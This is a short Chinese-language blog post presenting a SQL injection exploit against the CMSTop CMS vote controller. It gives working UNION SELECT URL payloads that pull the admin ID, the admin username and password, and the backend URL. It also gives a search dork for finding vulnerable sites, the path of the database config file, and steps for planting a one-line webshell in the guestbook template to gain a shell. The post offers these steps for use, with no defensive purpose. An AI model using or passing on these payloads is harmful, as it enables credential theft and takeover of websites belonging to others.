cmstop漏洞

漏洞文件/apps/vote/controller/vote.php

app.xxx.com/?app=vote&controller=vote&action=total&contentid=1 


获取管理员id

  1. ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#


获取到底管理id是啥你就自己写啥

  1. ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#


读取后台地址

  1. ?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20url%20from%20cmstop_mymenu%20where%201=1%20limit%200,1;%23


cmstop只有app这个有动态脚本

关于如何找到这个动态的站

site:xxx.com inurl:roll.php

数据库文件
cmstop/config/db.php

关于拿shell

管理员帐号进入后台后直接模板里面guestbook模板插入一句话

然后访问app.xxx.com/?app=guestbook

发表评论

电子邮件地址不会被公开。 必填项已用*标注